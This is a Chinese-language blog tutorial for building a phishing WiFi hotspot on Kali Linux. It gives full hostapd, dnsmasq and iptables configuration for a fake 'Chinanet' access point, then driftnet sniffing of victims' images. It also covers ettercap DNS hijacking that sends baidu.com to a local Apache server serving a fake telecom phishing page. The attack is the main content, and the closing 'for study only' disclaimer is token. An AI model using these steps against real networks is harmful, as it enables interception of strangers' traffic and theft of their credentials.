如何在kali下快速搭建钓鱼WiFi呢?全网最简单最详细的教程核能来袭。一起来看看吧。

请输入图片描述

准备

  • USB无线网卡(推荐8187 3070)
  • hostapd dnsmasq apache2
  • kali2020(最新版)

### 配置无线网卡

在终端执行 ifconfig查看是否有 wlan0如果存在,我们需要激活为监听模式。执行命令:

airmon-ng start wlan0

开启网卡监听模式

配置hostapd

在终端执行

vim hostapd.conf

写入下面内容

interface=wlan0mon
driver=nl80211
ssid=Chinanet #无线名称 随意即可
hw_mode=g
channel=6
macaddr_acl=0
ignore_broadcast_ssid=0

配置dnsmasq文件

终端执行

vim dnsmasq

写入内容如下:

interface=wlan0mon
dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.1.1
dhcp-option=6, 192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

配置防火墙和端口转发

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward


这样做的目的是保证我们的鱼儿能够正常上网。

给无线网卡分配IP地址

ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

启动钓鱼热点

hostapd hostapd.conf


这样我们便可以看到有一个 china-net的热点,但是不能连接,不要着急,我们启动dnsmasq即可。

dnsmasq -C dnsmasq.conf -d

这样,我们的热点便可以正常连接并上网了。

左边为连接的设备,右边有设备访问的网站信息。

高级操作

嗅探目标图片

在终端执行

driftnet -i wlan0mon

便可以看到目标访问的站点图片信息。

中间人攻击

域名重定向

修改 /etc/ettercap/etter.dns文件,添加内容如下:

baidu.com      A   192.168.1.1
*.baidu.com    A   192.168.1.1
www.baidu.com  PTR 192.168.1.1

即,当我们访问百度,自动跳转到本地。
开启本地 apache

service apache2 start

将做好的钓鱼页面放到 /var/www/html目录下,然后终端执行 ettercap -G利用 ettercap进行DNS劫持,具体做法这里不再诉述。

附html钓鱼页面

仿电信钓鱼页面

当然,你也可以对目标进行数据包的捕获和分析,我们这里也不再说了。

最后还得要重新声明下:

本文仅供学习和研究,请勿非法攻击他人,造成后果请自负!!!

Last modification:September 14th, 2020 at 08:51 am
正在沿街乞讨中……